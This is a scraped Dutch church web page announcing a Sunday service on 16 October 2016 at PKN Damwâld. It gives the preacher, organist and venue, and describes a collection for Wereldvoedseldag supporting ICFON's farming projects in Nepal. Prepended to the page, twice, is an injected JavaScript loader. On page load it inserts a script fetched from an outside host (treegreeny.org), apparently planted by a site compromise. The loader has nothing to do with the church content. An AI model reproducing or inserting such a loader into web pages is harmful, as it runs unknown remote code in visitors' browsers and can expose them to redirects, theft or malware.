;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 16 oktober 2016 9:30 uur - PKN Damwâld
zondag 16 oktober 2016
09:30 uur

Kerkdienst zondag 16 oktober 2016 9:30 uur

vg_-01

Informatie

Voorganger:Ds. S. Boukes
Organist:Tim van der Weide
Locatie: de Ontmoeting Foarwei 38, 9104 BX Damwâld
Collecte informatie
Eerste collecte: Wereldvoedseldag

Wereldvoedseldag: Verbetering voedselproductie in afgelegen bergdorpen in Nepal
In de afgelegen bergdorpen in Nepal heeft de bevolking moeite om voldoende voedsel te verbouwen. Dorpsbewoners leven van landbouw en veehouderij, maar rondom de bergdorpen is weinig vruchtbare grond. De bevolking heeft meestal geen toegang tot nieuwe landbouwmethoden. De organisatie ICFON zet zich, met ondersteuning van Kerk in Actie, in voor een betere voedselproductie. Wanneer dorpsbewoners meer voedsel produceren, stijgt hun inkomen. Op den duur verbeteren hierdoor ook hun levensomstandigheden. De dorpsbewoners krijgen onder andere landbouwtrainingen van ICFON. Daar leren ze hoe ze braakliggende grond weer kunnen bewerken en hoe ze erosie kunnen bestrijden. Ook oefenen ze met nieuwe landbouwmethoden om hun opbrengst te verhogen en leren ze hoe ze hun producten het beste kunnen verkopen op de markt. Gezinnen kunnen een lening krijgen van 60 euro om een geit aan te schaffen en een training te volgen voor de verzorging. Zo kunnen ze bijvoorbeeld geiten fokken. Dorpsbewoners kunnen zich ook aansluiten bij een spaargroep of een alfabetiseringscursus volgen. Dankzij ICFON ontwikkelen zij niet alleen nieuwe vaardigheden, maar leren ze ook zelf het heft in handen te nemen en ontwikkelen zij zich tot zelfbewuste en krachtige dorpsbewoners.

Tweede collecte: Kerk, eigen middelen
Uitganscollecte: Werelddiaconaat